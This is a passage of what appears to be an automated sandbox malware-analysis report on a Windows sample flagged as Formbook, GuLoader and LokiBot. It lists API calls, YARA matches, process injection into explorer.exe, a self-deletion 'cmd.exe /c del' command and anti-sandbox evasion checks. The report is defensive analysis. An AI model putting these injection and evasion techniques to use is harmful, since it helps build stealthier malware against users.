      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_0229616D NtResumeThread,
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_022905BD NtSetInformationThread,TerminateProcess,
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_02292999 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_0229659C NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_02292D95 NtSetInformationThread,
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_02292596 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_022929CD NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_022925CE NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E529660 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5296E0 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E529710 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E529FE0 NtCreateMutant,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E529780 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5297A0 NtUnmapViewOfSection,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E529540 NtReadFile,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5295D0 NtClose,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E529A50 NtCreateFile,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E529A00 NtProtectVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E529A20 NtResumeThread,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E529840 NtDelayExecution,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E529860 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5298F0 NtReadVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E529910 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5299A0 NtCreateSection,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E529650 NtQueryValueKey,
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E529670 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E529610 NtEnumerateValueKey,
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5296D0 NtCreateKey,
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E52A770 NtOpenThread,
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E529770 NtSetInformationFile,
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E529760 NtOpenProcess,
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E52A710 NtOpenProcessToken,
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E529730 NtQueryVirtualMemory,
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E529560 NtWriteFile,
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E52AD30 NtSetContextThread,
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E529520 NtWaitForSingleObject,
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5295F0 NtQueryInformationFile,
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E529A10 NtQuerySection,
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E529A80 NtOpenDirectoryObject,
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E529B00 NtSetValueKey,
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E52A3B0 NtGetContextThread,
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E52B040 NtSuspendThread,
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E529820 NtEnumerateKey,
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5298A0 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E529950 NtQueueApcThread,
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5299D0 NtCreateProcessEx,
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_00565C7C NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_00566167 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_00566405 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_0056616D NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_005662F2 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_005662EF NtQueryInformationProcess,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF95D0 NtClose,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF9540 NtReadFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF96E0 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF96D0 NtCreateKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF9660 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF9650 NtQueryValueKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF9780 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF9FE0 NtCreateMutant,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF9710 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF9860 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF9840 NtDelayExecution,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF99A0 NtCreateSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF9A50 NtCreateFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF95F0 NtQueryInformationFile,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF9520 NtWaitForSingleObject,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AFAD30 NtSetContextThread,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF9560 NtWriteFile,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF9610 NtEnumerateValueKey,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF9670 NtQueryInformationProcess,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF97A0 NtUnmapViewOfSection,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF9730 NtQueryVirtualMemory,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AFA710 NtOpenProcessToken,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF9760 NtOpenProcess,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AFA770 NtOpenThread,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF9770 NtSetInformationFile,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF98A0 NtWriteVirtualMemory,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF98F0 NtReadVirtualMemory,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF9820 NtEnumerateKey,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AFB040 NtSuspendThread,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF99D0 NtCreateProcessEx,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF9950 NtQueueApcThread,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF9A80 NtOpenDirectoryObject,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF9A20 NtResumeThread,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF9A00 NtProtectVirtualMemory,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF9A10 NtQuerySection,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AFA3B0 NtGetContextThread,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF9B00 NtSetValueKey,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_007081C0 NtCreateFile,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_00708270 NtReadFile,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_007082F0 NtClose,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_007083A0 NtAllocateVirtualMemory,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_007081BD NtCreateFile,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0070826A NtReadFile,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_00708212 NtReadFile,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_007082EA NtClose,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0070839D NtAllocateVirtualMemory,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0070841A NtAllocateVirtualMemory,
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_00401348
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_00401365
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5AD616
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E506E30
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5B2EF7
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5BDFCE
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5B1FF1
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5AD466
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4F841F
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5B1D55
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5B2D07
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4E0D20
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5B25DD
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4FD5E0
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E512581
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5B22AE
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5B2B28
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5A03DA
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5ADBD2
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E51EBB0
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5A1002
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5BE824
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5B28EC
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4FB090
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5120A0
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5B20A8
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E4EF900
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E504120
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AC841F
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B7D466
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE2581
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ACD5E0
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B825DD
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AB0D20
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B82D07
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B81D55
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B82EF7
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AD6E30
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B7D616
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B81FF1
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B8DFCE
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AE20A0
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B820A8
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ACB090
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B828EC
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B8E824
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ADA830
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B71002
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AD99BF
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AD4120
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ABF900
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B822AE
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B6FA2B
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AEEBB0
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B7DBD2
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B703DA
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B82B28
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04ADAB40
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_006F8C60
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0070C5BD
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_006F2D87
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_006F2D90
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_006F2FB0
      Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 04ABB150 appears 72 times
      Source: C:\Users\user\Desktop\211094.exeCode function: String function: 1E4EB150 appears 45 times
      Source: 211094.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: 211094.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: 211094.exe, 00000000.00000002.339451864.0000000002260000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs 211094.exe
      Source: 211094.exe, 00000000.00000000.318342223.0000000000416000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSKUMLERIERNE.exe vs 211094.exe
      Source: 211094.exe, 00000000.00000002.339491184.00000000022C0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSKUMLERIERNE.exeFE2XTeltplsu vs 211094.exe
      Source: 211094.exe, 00000004.00000002.408131386.000000001EB3E000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameEXPLORER.EXEj% vs 211094.exe
      Source: 211094.exe, 00000004.00000002.407362131.000000001E76F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 211094.exe
      Source: 211094.exe, 00000004.00000002.404606856.000000001DDA0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs 211094.exe
      Source: 211094.exe, 00000004.00000000.337376018.0000000000416000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSKUMLERIERNE.exe vs 211094.exe
      Source: 211094.exe, 00000004.00000002.404623819.000000001DEF0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs 211094.exe
      Source: 211094.exeBinary or memory string: OriginalFilenameSKUMLERIERNE.exe vs 211094.exe
      Source: 211094.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: 00000009.00000002.587412850.00000000006F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000009.00000002.587412850.00000000006F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000009.00000002.587981327.0000000000B30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000009.00000002.587981327.0000000000B30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000009.00000002.587932425.0000000000B00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000009.00000002.587932425.0000000000B00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000004.00000002.404736024.000000001E290000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000004.00000002.404736024.000000001E290000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000009.00000002.587887659.0000000000983000.00000004.00000020.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000004.00000002.399177906.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000004.00000002.399177906.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000009.00000002.592534520.0000000004FC7000.00000004.00000001.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/0@15/9
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6700:120:WilError_01
      Source: C:\Users\user\Desktop\211094.exeFile created: C:\Users\user\AppData\Local\Temp\~DF3FDFCBABC45FEEF5.TMPJump to behavior
      Source: unknownProcess created: C:\Windows\SysWOW64\explorer.exe
      Source: 211094.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\211094.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: C:\Users\user\Desktop\211094.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Users\user\Desktop\211094.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\211094.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\211094.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: 211094.exeReversingLabs: Detection: 22%
      Source: unknownProcess created: C:\Users\user\Desktop\211094.exe 'C:\Users\user\Desktop\211094.exe'
      Source: unknownProcess created: C:\Users\user\Desktop\211094.exe 'C:\Users\user\Desktop\211094.exe'
      Source: unknownProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\211094.exe'
      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\211094.exeProcess created: C:\Users\user\Desktop\211094.exe 'C:\Users\user\Desktop\211094.exe'
      Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\211094.exe'
      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{317D06E8-5F24-433D-BDF7-79CE68D8ABC2}\InProcServer32
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: Binary string: explorer.pdbUGP source: 211094.exe, 00000004.00000002.407424749.000000001E7F0000.00000040.00000001.sdmp
      Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000000.384686029.000000000DC20000.00000002.00000001.sdmp
      Source: Binary string: wntdll.pdbUGP source: 211094.exe, 00000004.00000002.404809631.000000001E4C0000.00000040.00000001.sdmp, explorer.exe, 00000009.00000002.591474852.0000000004BAF000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: 211094.exe, explorer.exe
      Source: Binary string: explorer.pdb source: 211094.exe, 00000004.00000002.407424749.000000001E7F0000.00000040.00000001.sdmp
      Source: Binary string: wscui.pdb source: explorer.exe, 00000006.00000000.384686029.000000000DC20000.00000002.00000001.sdmp

      Data Obfuscation:

      barindex
      Yara detected GuLoaderShow sources
      Source: Yara matchFile source: 00000004.00000002.399305439.0000000000562000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: 211094.exe PID: 6984, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: 211094.exe PID: 1872, type: MEMORY
      Yara detected VB6 Downloader GenericShow sources
      Source: Yara matchFile source: Process Memory Space: 211094.exe PID: 6984, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: 211094.exe PID: 1872, type: MEMORY
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_00407F3A push es; retn 2ADCh
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_004077E6 push ss; retf
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_02291A56 push edi; retf
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_02291B27 push edi; retf
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_02291B6D push edi; retf
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_02291BB0 push edi; retf
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_02291B8A push edi; retf
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_02291B8A push edi; retf
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_02291CAB push edi; retf
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_02291D33 push edi; retf
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_02291D33 push edi; retf
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_02291D16 push edi; retf
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_02291D59 push edi; retf
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_022919EF push edi; retf
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_022919EF push edi; retf
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E53D0D1 push ecx; ret
      Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_00564109 pushfd ; retf
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B0D0D1 push ecx; ret
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0070B3B5 push eax; ret
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0070B46C push eax; ret
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0070B402 push eax; ret
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0070B40B push eax; ret
      Source: C:\Users\user\Desktop\211094.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\211094.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\211094.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\211094.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\211094.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\211094.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\211094.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      barindex
      Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_02291627 NtSetInformationThread,NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_02291671
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_02291645
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_02291AA5
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_022916BB
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_02291A9E
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_02291A94
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_022916F5
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_02291B27
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_0229179F
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_022917E9
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_02291BD5
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_02291835
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_02291888
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_02291C9C
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_022918F5
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_02291948
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_02291995
      Source: C:\Users\user\Desktop\211094.exeCode function: 0_2_022919EF
      Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
      Source: C:\Users\user\Desktop\211094.exeRDTSC instruction interceptor: First address: 00000000022930E8 second address: 00000000022930E8 instructions:
      Source: C:\Users\user\Desktop\211094.exeRDTSC instruction interceptor: First address: 00000000022964EA second address: 00000000022964EA instructions:
      Tries to detect Any.runShow sources
